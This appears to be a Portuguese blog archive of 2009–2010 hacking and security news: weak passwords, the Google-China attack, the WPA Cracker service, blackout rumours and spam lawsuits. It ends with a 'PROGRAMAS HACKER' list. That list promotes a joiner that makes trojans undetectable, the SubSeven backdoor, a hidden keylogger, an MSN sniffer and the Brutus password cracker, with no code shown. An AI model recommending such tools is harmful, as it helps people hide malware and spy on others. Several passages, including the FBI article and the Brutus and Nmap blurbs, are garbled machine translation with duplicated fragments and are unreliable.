"O problema mudou muito pouco nos últimos 20 anos", disse Shulman, referindo-se a um estudo de 1990, realizado pela Unix e que mostrava um padrão de escolha de senhas parecido com os de hoje.

A senha mais comum encontrada pela Imperva foi "123456", seguida por "12345", "123456789" e "password". Segundo a Imperva, um hacker usando uma conexão DSL poderia acessar uma conta por segundo usando um programa simples, que testa senhas baseadas em palavras do dicionário.

"As pessoas precisam entender o que a combinação de senhas fracas significa no mundo de hoje, em que os ciberataques são automatizados: com um mínimo esforço, um hacker pode ganhar acesso a uma nova conta a cada segundo - ou mil contas a cada 17 minutos", explicou Amichai Shulman, um dos diretores da Imperva.

Outras senhas incluem nomes próprios, gírias, palavras conhecidas e senhas triviais, compostas por letras vizinhas no teclado, por exemplo. O RockYou é apenas um site que oferece penduricalhos para redes sociais, portanto o uso de senhas fracas nele não gera grandes riscos, mas o estudo também identificou que muitas das senhas são usadas também em outros sites, incluindo os de redes de relacionamento e de lojas virtuais.

EUA pedem a Pequim investigação sobre ataque a Google

2010-01-21T15:18:00.002-02:00

Washington, 21 jan (EFE).- A secretária de Estado americana, Hillary Clinton, pediu hoje a Pequim uma investigação meticulosa e transparente sobre o ciberataque ao Google proveniente da China, que levou o site a ameaçar encerrar atividades no país asiático.

"Esperamos das autoridades chinesas uma revisão minuciosa das invasões cibernéticas que levaram o Google a fazer o anúncio (de fechar o negócio na China) e também esperamos que tal investigação e seus resultados sejam transparentes", disse a chefe da diplomacia americana em discurso sobre a liberdade na internet, em Washington.

Por outro lado, Hillary convidou as empresas a rejeitarem a censura na internet. "A censura não deve ser aceita de nenhuma maneira por nenhuma companhia de nenhum lugar", sublinhou.

Ao mesmo tempo, lançou uma advertência a Pequim, ao afirmar que "países que restringem o livre acesso à informação ou violam os direitos básicos dos usuários de internet correm o risco de se isolar do progresso".

No último dia 12, o Google ameaçou encerrar suas operações na China após seu negócio de e-mail sofrer um ataque proveniente do país asiático.

O ciberataque chegou a gerar certa tensão diplomática entre EUA e China. Washington saiu em defesa do Google e da liberdade na internet, pediu explicações de diplomatas chineses em Washington e estuda fazer esta semana uma queixa formal a Pequim pela invasão.

Serviço online descobre senhas para invadir redes Wi-Fi

2009-12-13T00:57:00.002-02:00

Pesquisadores desenvolveram um aplicativo para testes de segurança que usa técnica de força bruta e testa milhões de palavras em busca das senhas compatíveis usando um cluster com centenas de computadores distribuídos, num arranjo de "cloud computing". O serviço abrevia drasticamente o tempo gasto para "quebrar" uma senha, que de vários dias passa a alguns minutos.
Segundo o site The Register, a ferramenta denominada WPA Cracker faz uso do poder de processamento de 400 computadores. O serviço é pago e existem duas modalidades de pesquisas de senhas. A primeira custa US$ 34 e varre todo o dicionário de 135 milhões de palavras em 20 minutos. A segunda usa apenas 50% da capacidade computacional do cluster e custa US$ 17. A pesquisa completa, neste caso, pode demorar 40 minutos. Se em vez de 400 computadores em cluster fosse usado um único PC, mesmo que equipado com um processador poderoso como o Intel Core i7, o tempo mínimo para quebrar a senha seria de cinco dias, possivelmente mais.

O serviço foi criado por um já conhecido pesquisador hacker, que prefere ser chamado pelo seu pseudônimo Moxie Marlinspike - algo muito comum mesmo entre pesquisadores sérios. Em uma entrevista ao site PC World, Marlinspike afirmou que a ideia surgiu depois de conversar com outros pesquisadores a respeito de como aumentar a velocidade de auditoria para fazer testes de penetração em redes WPA. "É meio chato ter que esperar por cinco ou dez dias para ter os resultados", disse.

O serviço funciona contra os sistemas Wi-Fi com criptografia WPA e WPA2, desde que estes possuam autenticação baseada em Pre-Shared Keys (PSK). A falha no WPA-PSK já é conhecida há tempos pelos hackers, e para explorá-la usa-se uma técnica ainda mais antiga, que data dos anos 70: o ataque de força bruta por dicionário, no qual usa-se uma lista bastante grande de palavras que são testadas, uma a uma e combinadas entre si, como senhas ou chaves de criptografia em sucessivas tentativas. No caso do dicionário usado no WPA Cracker, a base de dados foi desenvolvida usando os conceitos de OpenWall, onde as informações das próprias pesquisas a alimentam.

Nas chaves Wi-Fi que usam a tecnologia de criptografia WPA, as senhas devem possuir no mínimo oito caracteres (no Windows, por exemplo, a senha de login pode ser mais curta ou mesmo não existir) e as entradas podem usar uma variedade enorme de palavras e frases. Conforme explicado no site do projeto, foi feita uma pesquisa de termos específicos recorrentes, que também foram adicionados ao conjunto de elementos usados nos testes. A pesquisa levou em conta os termos mais usados por quem administra ou configura roteadores Wi-Fi. Na lista constam palavras redigidas com o linguajar "leet" (por exemplo, h4ck3rzz) e expressões comuns usadas pelos técnicos e que acabam sendo usadas como senhas.

Mais informações podem ser encontradas no site oficial, em www.wpacracker.com

Supercomputador para estudar mudança no clima

2009-12-10T15:29:00.002-02:00

O Centro Alemão de Cálculo Climático (DKRZ, na sigla em alemão) colocou em funcionamento nesta quinta o supercomputador "Blizzard" (Nevasca), cuja missão será calcular futuras mudanças climáticas e, inclusive, prever todo tipo de fenômenos catastróficos, como furacões ou tornados.

"É o maior computador dedicado exclusivamente à investigação climatológica", disse a ministra alemã de Investigação e Ciência, Annette Schavan, durante sua inauguração.

Só nos Estados Unidos existe algum computador comparável com o "Blizzard", garantiu Thomas Ludwig, gerente do DKRZ, instituto localizado em Hamburgo.

Com um peso de 35 toneladas, o "Blizzard" utiliza em seu trabalho 8.448 microprocessadores, com os quais alcança uma velocidade de 158 teraflops por segundo, o que faz com que seja 60 vezes mais rápido que seu antecessor, e 20 mil vezes mais rápido que um computador convencional.

O arquivo do supercomputador, o maior do mundo para armazenamento de dados climáticos, pode armazenar mais de 60 petabytes, o que equivale a cerca de 13 milhões de DVDs.

Um total de 56 braços robotizados são encarregados de buscar as informações armazenadas em 65 mil contas magnéticas com os dados arquivados pelo "Blizzard", que tem cerca de 50 quilômetros de cabo unindo seus componentes.

Os responsáveis do DKRZ afirmaram que a maioria dos dados que são estudados na Cúpula das Nações Unidas sobre Mudanças Climáticas (COP-15), em Copenhague, procedem dos cálculos do instituto em Hamburgo.

Além das mudanças na atmosfera e os oceanos, o "Blizzard" calcula também processos no gelo, na terra e nas vegetações, assim como sua influência no efeito estufa.

O computador teve um custo de 35 milhões de euros, fornecidos pelo Ministério de Investigação e Ciência, enquanto a modernização do edifício que o abriga custou 26 milhões de euros à cidade de Hamburgo.

A metade do tempo de trabalho do computador é dedicada às pesquisas do próprio DKRZ, enquanto a outra metade é utilizada por cerca de 100 de grupos de trabalho científico da Alemanha.

O instituto de Hamburgo reconheceu que o "Blizzard" tem grande consumo de energia, mas ressaltou que toda ela tem origem renovável.

Hacker de 18 anos confessa que aplicou golpes de R$ 1 milhão

2009-12-06T18:30:00.000-02:00

Para a família, um jovem estudante viciado em computador. Para a noiva, o rapaz perfeito: bonito, inteligente e apaixonado. A verdadeira identidade de David Barbosa, 18 anos, hacker desde os 15, só foi descoberta quarta-feira por policiais da 12ª DP (Copacabana), quando ele aplicava mais um golpe: alugava um Corolla usando documento e cartão de crédito falsos. De três anos para cá, o jovem calcula ter movimentado R$ 1 milhão. Por semana, chegava a gastar R$ 5 mil em viagens, aluguéis de automóveis importados e estadias em hotéis de luxo.

Como no filme Prenda-me se for capaz ¿ no qual Leonardo DiCaprio interpreta um garoto de 17 anos, gênio na arte da falsificação de cheques que durante anos engana a polícia com vários disfarces -, David também tinha diversas identidades, profissões e contas bancárias. Na área VIP dos aeroportos, usando ternos alinhados, ele fingia ser um executivo rico e ocupado.

"Quem vai desconfiar de uma pessoa bem vestida e com um cartão ouro na carteira? Uma vez fiz o teste: fui de bermuda, camisa e tênis. Não adianta que o tratamento não é o mesmo", comentou o jovem, que por duas vezes chegou a se identificar como piloto de aeronave, usando uniforme comprado na internet.

David também se apresentava como militar do Exército. Possuía carteira, uniforme e colete. Apaixonado por armas, o adolescente comprou réplicas pela internet. Filho de um taxista e uma dona de casa, o caçula de três irmãos aprendeu sozinho a usar o computador. E com uma inteligência acima do normal, rapidamente passou a dominar todas as ferramentas e linguagens de programação. Aos 15 anos, já era considerado um gênio da computação. Foi quando um amigo que conheceu pela rede o contratou para criar um programa que conseguisse invadir sistemas de bancos e capturar dados de cartões de crédito de clientes. Pelo trabalho, David recebeu R$ 5 mil.

"Foi aí que percebi que podia ganhar muito dinheiro", contou o hacker. Em sociedade com um rapaz de 25 anos, de Juiz de Fora (MG), os golpes começaram. "Conseguíamos muito dinheiro. Dávamos festas direto. Dava R$ 50 de esmola para mendigo na rua. Um dia, quanto estava em Juiz de Fora, fui sequestrado por dois PMs. Tinha levado R$ 200 mil e eles sabiam do dinheiro. Disseram que iam me matar se eu não entregasse. Depois disso parei de pensar em juntar dinheiro", disse.

Desconfiado de que o sequestro fora planejado pelo sócio, David decidiu atuar sozinho. "Parei com os bancos e fui trabalhar sozinho. Passei a invadir os sites de compras para capturar os dados de clientes. Fazia compras e revendia, mas também usava as informações das pessoas para pedir cartões de crédito ao banco. Mas preferia os que têm limite alto", contou.

FBI diz: Hackers visam escritórios de advocacia / FBI says hackers targeting law firms, PR companies

2009-11-17T22:11:00.002-02:00

Hackers estão cada vez mais alvo de advocacia e empresas de relações públicas, com um sofisticado sistema de correio electrónico que invade as suas redes de computador para roubar dados sensíveis, muitas vezes ligada a grandes clientes corporativos que fazem negócios no exterior.

O FBI emitiu um alerta que adverte empresas de "aumento notável" nos esforços para invadir sistemas de empresas de direito do computador - uma tendência que os especialistas dizem cibernético começou por volta de dois anos atrás, mas tem crescido dramaticamente.

Em muitos casos, as invasões são o que os especialistas em segurança cibernética descrevem como "spear phishing", os ataques que vêm através de spam e-mails personalizados que podem deslizar através de defesas comum e parecem inofensivas porque não têm linhas de assunto apropriado para as empresas de uma pessoa e parecem vir a partir de uma fonte confiável.

Infiltrando os sistemas de computadores, disse ele, "é realmente uma maneira ótima de obter segurança econômica, pessoal e informações pessoais relacionadas".

Alan Paller, diretor de pesquisa do SANS Institute, uma organização de segurança de computador, disse hoje que uma grande firma de advocacia em Nova York, foi invadido no início de 2008 em um ataque que teve origem na China.

Oficiais do FBI não retornaram imediatamente as mensagens para comentar a respeito da China. A assessoria do FBI foi datada de 1 de novembro de 2009.

Funcionários do U.S. têm sido cautelosos ao público que liga os ataques cibernéticos a China. Mas relatórios recentes do governo têm descrito ataques informáticos acreditado para ter originado na China, embora não esteja claro se as invasões foram realizadas por, ou com o aval de qualquer elemento do governo chinês.

Como é frequentemente o caso com o cibercrime, é difícil dizer se os hackers estavam trabalhando em nome do governo do país, localizada no mesmo país, ou simplesmente de roteamento de tráfego através de computadores aquele país.

Enquanto alguns ataques de rede de computadores podem estar ligados a países como a China, em alguns casos, eles agora podem ser orquestrada por grupos independentes de crimes cibernéticos.

Os hackers vão depois de escritórios de advocacia, muitas vezes as empresas-alvo que estão a negociar um acordo internacional importante - nada de procurar uma patente de uma tecnologia sensível para abrir uma nova fábrica em outro país.

Ao abrir um "phishing" e-mail em si não representa um perigo, eles muitas vezes contêm anexos ou links da Web que, quando clicado em aberto ou irá se infiltrar na rede ou instalar programas maliciosos.

Uma vez que o hacker está na rede, que muitas vezes planta um programa de computador que procura, recolhe e copia os arquivos e os envia para um servidor de computador, normalmente em outro país. O programa também pode criar um backdoor que permitirá que os hackers para voltar mais tarde.

O FBI alertou que os anexos ou links podem aparecer a qualquer coisa, desde uma foto a um programa executável.

Falando para uma multidão em uma conferência da American Bar Association sexta-feira, Bleier funcionários e outros cibers advertiu que as empresas precisam começar a reavaliar o que eles colocam em suas redes por hackers estão ficando cada vez mais sofisticados.

Embora os hackers costumavam ser invasores cibernéticos solitário, agora com mais freqüência são parte de grandes operações de crime organizado transnacional, disse Chris Painter, diretor da Casa Branca na cibernética.

O FBI disse que notou o aumento dos ataques contra escritórios de advocacia e empresas de relações públicas durante as investigações em curso

Hacker invadiu site da ONS dois dias após o apagão

2009-11-17T08:54:00.001-02:00

Dois dias após o apagão que atingiu 18 Estados brasileiros, um hacker invadiu, na noite de quinta-feira, o site corporativo do Operador Nacional do Sistema Elétrico (ONS). Segundo a entidade, porém, não houve qualquer ameaça à operação do sistema, que é gerido por meio de uma rede blindada. O ONS informou que o ataque foi detectado pela segurança interna e o problema resolvido no dia seguinte.

A avaliação interna é que o hacker tinha o objetivo de mostrar que pode acessar a rede do ONS. Ainda na noite do apagão, surgiram boatos de que a queda de energia teria sido provocada pela ação de hackers, o que foi prontamente desmentido pelas autoridades do setor elétrico. Os boatos ganharam força após a declarações de especialistas em segurança digital, admitindo a possibilidade de ataques.

Segundo o ONS, porém, a rede que gerencia a operação do setor elétrico é blindada e não está disponível na internet. O sistema de segurança prevê checagens de 30 em 30 minutos e o acesso é feito por comando de voz e não por senhas.

O site atacado na última quinta-feira contém apenas informações administrativas do ONS, como contratos, e dados e estatísticas sobre a operação.

Fontes da CIA afirmam que ataques de hackers já provocaram ao menos dois apagões no Brasil

2009-11-11T18:28:00.000-02:00

Ataques de hackers já provocaram pelo menos dois apagões que afetaram ao mesmo tempo várias cidades do Brasil nos últimos quatro anos, segundo fontes da CIA e da área de segurança dos Estados Unidos. As informações foram divulgadas pela imprensa dos EUA. Um ex-diplomata americano ouvido pelo GLOBO confirmou a denúncia. Segundo as fontes americanas, os apagões em questão aconteceram em 2005, no Rio de Janeiro, e em 2007, no Espírito Santo e norte do Rio, este último afetando milhões de pessoas. Órgãos brasileiros não confirmam as informações de oficiais americanos e não há provas até agora de que o apagão de terça-feira tenha sido causado por um ciberataque.

- Fui informado por fontes confiáveis da CIA e do departamento de Defesa de que os ataques mencionados publicamente no passado pela própria CIA e pelo presidente (Barack) Obama aconteceram no Brasil - afirmou James Lewis, ex-diplomata americano e hoje especialista em cibersegurança do Centro de Estudos Estratégicos e Internacionais, com sede em Washington.

No ano passado, quatro meses depois de assumir o cargo, Obama citou os ataques para afirmar que a possibilidade de uma guerra virtual no mundo tinha deixado o campo da teoria. O presidente americano decretou a segurança cibernética uma prioridade nacional.

- Sabemos que invasores cibernéticos testaram nossa rede elétrica, e que em outros países ataques cibernéticos deixaram cidades inteiras no escuro - afirmou, sem mencionar o país. - Está claro que a ameaça cibernética é um dos desafios econômicos e de segurança nacional mais sérios que enfrentamos como nação.

Em 2008, o principal analista de ciberssegurança da CIA havia anunciado que hackers invadiram o sistema de companias de serviço público fora dos EUA fazendo exigências. Em pelo menos um caso, acrescentou, eles haviam provocado um apagão em várias cidades. A CIA, na época, também não revelou o país.

- Não sabemos quem executou esses ataques e por que, mas todos envolveram invasores através da internet - afirmou Tom Donahue, da CIA, em janeiro de 2008 ao jornal "Washington Post", que considerou na época a revelação incomum.

Rumores na área de segurança americana davam conta de que os ataques mencionados teriam acontecido no Brasil, segundo o GLOBO apurou três semanas antes do apagão de terça.

No domingo passado, o programa "60 Minutes" da CBS confirmou os rumores com pelo menos seis fontes gabaritadas do serviço secreto, da área militar e de organizações da área de segurança dos Estados Unidos. O programa afirma que Obama e a CIA se referiam ao Brasil em seus comentários. Segundo a revista "Wired", Richard Clarke, um dos maiores especialistas americanos em guerra cibernética, também já havia confirmado publicamente os ataques no Brasil.

Segundo a CBS, os ataques aconteceram em três cidades do Rio de Janeiro em 2005 e em várias cidades do Espírito Santo em 26 de setembro de 2007, este último afetando milhões de pessoas. Segundo a reportagem do GLOBO publicada na época, o apagão afetou também cidades do Norte do Rio, embora tenha se concentrado no Espírito Santo.

Lewis explica ser comum casos de extorsão por parte de hackers, mas que geralmente as empresas preferem não divulgar os ataques. A invasão, nesses casos, é feita por pequenos grupos de criminosos cibernéticos equipados com bons computadores. Ele informa que há ataques conhecidos a empresas americanas e inglesas.

- Sabe-se que a máfia russa, chineses e até brasileiros realizam ataques do gênero. Eles pedem dinheiro e, se não forem atendidos, derrubam o sistema - afirma. - Não dá para saber se o último apagão foi causado por hackers. Mas certamente esta é uma possibilidade.

Alan Paller, diretor de segurança do Sans, um megainstituto americano de treinamento e certificação na área de segurança, confirma que casos de extorsão respondem por uma grande parcela dos crimes cibernéticos.

- Não tenho informações de bastidores sobre esse caso. Mas é sim possível que um hacker tenha gerado o apagão. Ataques a empresas de serviço público são cada vez mais comuns - afirmou Paller, ressalvando que as empresas, especialmente na área de defesa e de serviços públicos, quase nunca admitem que seus sistemas foram invadidos, preferindo ficar com o prejuízo.

Ele cita casos clássicos de extorsão como o roubo, no início do milênio, de um milhão de números de cartões de crédito nos EUA. Algumas empresas chegaram a pagar 100 mil libras para não ter os dados revelados. Outro ataque famoso afetou o setor de jogos, e um terceiro, uma organização médica americana ameaçada de ter os dados dos pacientes divulgados. O quarto caso, diz, foi o anúncio da CIA de que hackers provocaram apagões.

- Muita gente acaba pagando - diz.

O ministro de Minas e Energia, Edison Lobão, não quis comentar a possibilidade de o apagão ter sido causado por algum hacker, mas afirmou que tudo será averiguado. Furnas também nega. Segundo a empresa, em 2007 a causa do apagão foi a poluição acumulada sobre os cabos de energia por conta da falta de chuvas na região por cerca de oito meses. O ex-presidente da Eletrobrás e atual diretor da Coppe/UFRJ, Luiz Pinguelli Rosa, afirmou em entrevista à GloboNews não acreditar que o apagão de terça-feira tenha sido causado por algum tipo de sabotagem. Posteriormente, acrescentou que aparentemente não havia danos físicos no sistema, como a queda de uma torre por um raio. O diretor de Itaipu, Jorge Samek, informou que o apagão pode ter sido causado por alterações climáticas.

Hacker troca senha e exige US$ 350 mil

2009-11-08T22:54:00.003-02:00

Criminoso, que estava no Leste Europeu, invadiu o servidor de computadores de um órgão federal em maio do ano passado

Dinheiro não foi pago, e hacker não foi capturado; computadores do governo federal sofrem, por hora, 2.000 tentativas de ataque

Um hacker baseado num país do Leste Europeu invadiu o servidor de computadores de um órgão ligado a um ministério no ano passado. O criminoso trocou a senha do sistema. Paralisou a operação de acesso aos dados. Deixou apenas um recado: só recolocaria a rede novamente em operação após receber US$ 350 mil.

O ataque ocorreu em maio de 2008. Está até hoje cercado de sigilo. A Folha obteve a confirmação do crime, mas não a indicação de qual foi o ministério e o órgão atacado. O dinheiro não foi pago ao criminoso.

"Decidiu-se por não pagar. Esse órgão ficou 24 horas sem operar, com cerca de 3.000 pessoas sem ter acesso aos dados daquele servidor", relata Raphael Mandarino Junior, 55, o matemático no cargo de diretor do Departamento de Segurança da Informação e Comunicação do Gabinete de Segurança Institucional da Presidência da República.

Uma espécie de ciberczar da administração federal, Mandarino comanda cem pessoas no seu departamento, criado em 2006. Só no ano passado, entretanto, passou a existir uma política geral e específica a respeito de crimes cibernéticos na esfera federal. Ele relata como foram as providências tomadas após o mais grave ataque de hacker sofrido até hoje pelo governo brasileiro.

"Foram momentos tensos. Acionamos a Polícia Federal. Havia um backup [cópia] de todos os arquivos em outro lugar. Uma equipe reconstruiu o servidor com as mesmas informações que o hacker havia tentado destruir. Mas ainda demorou uma semana para quebrar os códigos deixados pelo criminoso no servidor original."

Hacker terá de pagar indenização bilionária por spam no Facebook

2009-10-30T21:27:00.004-02:00

O site de relacionamentos Facebook divulgou nesta quinta-feira (29) que ganhou uma indenização contra Sanford Wallace, um hacker que invadiu contas de usuários para enviar spams em seus perfis. De acordo com o blog oficial da rede social, o valor estipulado pela justiça norte-americana chega a US$ 711,2 milhões (cerca de R$ 1,3 bilhão).

De acordo com o site, a audiência ocorreu no último dia 18 de setembro, segundo o documento da corte federal de San Jose, na Califórnia. A rede social havia entrado com o processo no começo do ano contra Wallace e mais outros dois spammers, Adam Arzoomanian e Scott Shaw, que ainda esperam pela sentença da justiça californiana.

"Não achamos que vamos receber a grande maioria da recompensa, mas esperamos que isso sirva para dissuadir continuamente esses criminosos", afirmou o site por meio do texto no blog. "Esta é mais uma importante vitória em nossa luta contra o spam".

A justiça também acusa Wallace de atentado criminoso, o que significa que, além do julgamento, ele também poderá receber pena de prisão. Segundo o Facebook, os hackers acessaram contas de pessoas inscritas no Facebook para enviar mensagens falsas diretas e nos murais nas páginas dos usuários.

Apple fecha a porta para o "jailbreaking"

2009-10-17T19:00:00.002-03:00

A Apple tomou mais uma atitude para coibir a prática do jailbreaking, o desbloqueio do telefone pelos hackers. A empresa lançou uma nova versão da BootROM do iPhone, que fecha uma antiga brecha de segurança utilizada pelo popular exploit 24kPwn.

» Ferramenta blackra1n destrava iPod e iPhone pelo Windows
» Hackers desbloqueiam iPhone 3G S com iPhone OS 3.1

Os novos modelos, que começaram a ser vendidos na semana passada nos EUA, já têm o iBoot-359.3.2 e com isso, não podem ser mais destravados pelos atuais métodos, oferecidos pelo conhecido grupo Dev Team e mais recentemente pelo hacker GeoHot.

De acordo com o site TG Daily, a correção no firmware do iPhone é mais uma ação da Apple contra a prática que, segundo a empresa, acaba por "enfraquecer a experiência do iPhone, atingir os direitos autorais da Apple e diminuir o valor total do produto e de seu ecossistema para os consumidores".

Além de criticar ferozmente a prática, a empresa diz que a modificação pode "causar sérios problemas de operação" no dispositivo, interferindo nas funções de segurança, APIs e chamadas do sistema, o que pode causar quebras e travamento nos aplicativos. O hack também não permite (ou, no mínimo, desencoraja) a execução correta das atualizações.

Hackers podem ter causado falha no sistema do Bilhete Único

2009-10-12T20:27:00.000-03:00

Secretaria Municipal dos Transportes vai investigar o caso.
Durante a semana, houve filas e protestos em razão da falha na recarga.

A pane no sistema do Bilhete Único que causou horas de espera da população nos postos de recarga em São Paulo durante a semana pode ter sido causada por piratas da internet, os chamados hackers.

Veja o site do SPTV

Segundo o secretário municipal dos Transportes, Alexandre de Moraes, se for detectada falha da empresa, no entanto, ela será responsabilizada.

"Nós identificamos o problema. Foi no computador central. Agora os técnicos estão verificando uma hipótese, ainda não descartada, de vírus, de um hacker ter entrado na área. Ou foi um problema da própria empresa contratada. Nós vamos analisar e, eventualmente, descobrindo, vamos responsabilizar aquele que tiver de ser responsabilizado.”

O sistema de recarga do Bilhete Único voltou a funcionar nesta sexta-feira (9), mas, segundo os usuários, mais lento do que o normal. Em alguns pontos da capital paulista, filas foram formadas. Um problema no armazenamento de dados complicou as recargas durante a semana. Segundo a São Paulo Transportes (SPTrans), o reparo foi feito na madrugada e a operação voltou ao normal.

Para muita gente, sair com o bilhete carregado das lotéricas da cidade nesta sexta-feira foi quase como ganhar na loteria. Foi a quarta tentativa de uma usuária nesta semana. "Consegui, enfim, depois de três dias", comemorou. Depois de tantos transtornos, os funcionários da lotérica não conseguiam ficar muito confiantes. “Espero que tenha normalizado, mesmo lento tomara que não caia”, disse uma funcionária.

O sistema de recarga ficou lento durante a semana toda. Nos seis mil postos que oferecem o serviço, houve problemas. A explicação estava em cartazes. E foram muitos casos de pessoas que tentaram, em vão, carregar o bilhete. O sistema teve uma sobrecarga que, segundo a SPTrans, não era compatível com o movimento de recarga.

Um trabalho no armazenamento de dados foi feito, e o sistema voltou. Com ele, voltaram também as filas. O garçom João de Souza teve que esperar quase 20 minutos para recarregar o bilhete. “Não é fácil”, comentou.

Alguns usuários perderam a paciência durante esta semana e houve registros de máquinas de recarga quebradas. O prejuízo ainda não foi contabilizado.

Google ameaça processar hacker que criou versão alternativa do Android

2009-09-28T17:01:00.002-03:00

Steve Kondik, mais conhecido na internet como “Cyanogen”, recebeu notificação do Google para cessar a distribuição de sua ROM de sistema modificada para smartphones Android, conhecida como “CyanogenMod”. Esta é uma das ROMs mais populares entre os usuários dispostos a alterar seus aparelhos, com cerca de 30 mil usuários ativos.

A CyanogenMod contém uma série de patches e modificações em relação ao sistema Android original, que além de melhorar o desempenho dos aparelhos onde está instalada, adiciona uma série de “itens de conforto” que tornam a experiência do usuário mais fácil e agradável. Como o Android é um sistema operacional Open Source, baseado no Linux, tais modificações são permitidas.

O problema, segundo mensagem do Google ao site Android & Me, é a redistribuição de aplicativos “fechados” como o GMail, YouTube, Google Maps e afins. Eles não fazem parte do sistema operacional, não estão sob a licença GPL e, mesmo não modificados, só podem ser redistribuídos pelos fabricantes dos dispositivos.

Mas isto não significa o fim da linha para o CyanogenMod. Kondik entrou em contato com o Google e acredita que chegou a uma solução que pode agradar os dois lados. No site oficial do software ele informa que a próxima versão do CyanogenMod será uma versão “básica”, sem aplicativos não livres.

Junto com o sistema, ele incluirá um utilitário que permitirá ao usuário fazer o “backup” dos aplicativos que vieram com o sistema original do aparelho e reinstalá-los na nova ROM. Assim, os usuários ganham as vantagens do software modificado, mantém os aplicativos do Google e nenhum copyright é infringido.

No momento, o site oficial (www.cyanogenmod.com) do projeto cessou a distribuição de versões atuais da ROM. Ainda não há previsão para o lançamento da nova versão.

Hackers criam rede alternativa de telefonia celular GSM na Holanda

2009-08-21T11:06:00.002-03:00

Baseada em Software Livre, “operadora” experimental recebeu quase 400 usuários

Durante o evento Hacking At Random 2009 ( HAR 2009) em Vierhouten, na Holanda, o hacker alemão Harald Welte operou a primeira rede de telefonia celular GSM baseada em software Open Source. Montada com permissão das autoridades locais, a “operadora” chegou a registrar 391 “assinantes” ao longo dos quatro dias do evento.

A estrutura foi baseada em dois transmissores ( BTS – Base Transceiver Station) amarrados ao topo de uma árvore e conectados a um controlador ( BSC – Base Station Controller), na verdade um PC rodando o software OpenBSC , desenvolvido pelo próprio Harald. Assim que um celular entrava ao alcance da rede, recebia uma mensagem SMS com um código, que deveria ser registrado em um website. A partir daí, o usuário era livre para fazer e receber chamadas.

Segundo Harald, apesar da baixa potência dos transmissores (limitada a pedido das autoridades) a cobertura do sinal foi considerada muito boa, englobando quase todo o local do evento. O software também se mostrou funcional e razoavelmente estável, apesar de alguns “segfaults” a cada três ou quatro horas. Mais informações sobre o OpenBSC podem ser encontradas em bit.ly/2m0Nmm

Fonte: geek

PROGRAMAS HACKER

2009-08-19T17:20:00.033-03:00

JOINER

Excelente joiner, além de juntar arquivos, deixa seu trojan indetectável!

Subseven

Sub7, ou SubSeven ou Sub7Server, é o nome de um programa popular backdoor. Ele é usado principalmente para fazer travessuras, como esconder o cursor computador, alterar as configurações do sistema ou carregamento de sites. No entanto, ele também pode ser utilizado para pedidos de antecedentes criminais mais graves, como roubo de senhas e detalhes do cartão de crédito. Seu nome foi derivado de ortografia NetBus ( "Subten") e trocando "dez" com "sete".
Obs.: Lei as instruções antes!

Anti Trojan Elite
Anti Trojan Elite limpa arquivos usados por hackers, incluindo trojans, spywares e por aí vai. PossuAnti Trojan Elite limpa arquivos usados por hackers, incluindo trojans, spywares e por aí vai. Possui gerenciamento de sistema, controlando portas UDP e TCP/IP e mapeando aplicativos. Descarregue módulos, otimize o sistema, repare ferramentas e muito mais.

Free ToolKit Antivirus Utility

Faça o download e utilize sem nenhum custo a poderosa ferramenta que escanea e remove vírus, spyware, adware, keyloggers, etc.

Kit de Ferramentas do eScan GRATUITO é uma ferramenta que detecta se sua máquina está infectada, verificando inclusive os arquivos de registro do Windows.
Esta ferramenta é muito fácil de utilizar e pode ser executada inclusive em uma máquina que já tenha um antivirus instalado.

Swift AntiVirus

O mecanismo de detecção do Swift AntiVirus é efetivo contra mais de 20 mil variantes de vírus, trojans (cavalos de tróia), worms e dialers. Atualiza o banco de dados automaticamente, assim que novas assinaturas são disponibilizadas. Oferece escaneamento completo, rápido (locais específicos) e, de quebra, uma análise da memória (escaneamento de processos ativos).

Entre as principais características, estão o baixo consumo de recursos do sistema e a alta velocidade com que são realizadas as análises.

Brutus

AET2 obtem pares do username/senha usando o ataque simples do dicionário. Usa os seguintes protocoloAET2 obtem pares do username/senha usando o ataque simples do dicionário. Usa os seguintes protocolos: Pop3, ftp, imap, telnet, senhas do web server, routeres, e interruptores, e costume que scripting à força brutal qualquer coisa. O motor de vários estágios da autenticação das características, da modalidade do único usuário modalidade do usuário rachando-se, múltiplo que racham-se, capacidade cheia da força brutal, até 60 conexões simultâneas, excepto e continuam a sessão, a sessão do Auto-apoio, da autenticação da importação e da exportação tipos feitos sob encomenda, processamento de lista da palavra/geração, de proxy das PEÚGAS sustentação e análise do formulário do HTML.

Nmap

Início - Ajuda Em português utilidade do S.A. para a exploração da rede ou o exame da segurança. Sutilidade do S.A. para a exploração da rede ou o exame da segurança. Suporta a exploração do sibilo (determine que anfitriões estão acima), muitos move as técnicas de exploração (determine que serviços os anfitriões estão oferecendo), e o fingerprinting do TCP/IP (identificação do sistema de exploração de anfitrião remoto). Nmap igualmente oferece a especificação flexível do alvo e do porto, a exploração do chamariz, a determinação de características da previsibilidade da seqüência do TCP, a exploração do sunRPC, a exploração reversa-identd, e o mais.

Nessus

É um varredor remoto livre, moderno, e completamente caracterizado da segurança para o linux, o DEB,é um varredor remoto livre, moderno, e completamente caracterizado da segurança para o linux, o DEB, os solaris e os alguns outros sistemas. É multithreaded, de encaixe-baseado, tem uma relação agradável de GTK, e executa-a atualmente sobre 330 controlos de segurança remotos. Tem as capacidades poderosas do relatório (HTML, látex, texto do ASCII) e indic não somente problemas, mas sugere uma solução para cada um deles.

John the Ripper

Senha de UNIX da alta qualidade, provavelmente o disponível o mais rápido.

MSN Monitor & Sniffer

Monitora e captura conversas no MSN em sua rede local. Basta rodar o programa em qualquer computador da rede e ele irá gravar todas as conversas de qualquer computador em sua rede e exporta para um arquivo HTML.

KGB Keylogger

Captura tudo que é digitado no teclado e grava em um arquivo. É capaz de trabalhar escondido e você Captura tudo que é digitado no teclado e grava em um arquivo. É capaz de trabalhar escondido e você pode chamá-lo através de uma combinação de teclas. E o arquivo final é fácil de ler e permite que você saiba tudo o que foi feito em seu computador. Possui utilitário de instalação e desinstalação.

Password Spectator Lite 1.4

Password Spectator Lite 1.4Mostra para você a senha escondida por ***, muito util.

SATAN

SATAN obtem o maximo de informação sobre redes atravez da analise de serviços como finger, NFS, NIS, ftp e tftp e rexd. As informações incluem possiveis falhas de segurança, geralmente em forma de configuração incorreta de serviços da rede.

Gravadora caça hackers que roubaram música de Lewis/Timberlake

2009-08-19T16:59:00.000-03:00

LONDRES (Reuters) - A gravadora SyCo e a Federação Internacional da Indústria Fonográfica (IFPI, na sigla em inglês), entidade que representa o setor mundialmente, pediram ajuda à polícia para localizar hackers que vazaram na Internet uma canção de Leona Lewis e Justin Timberlake.

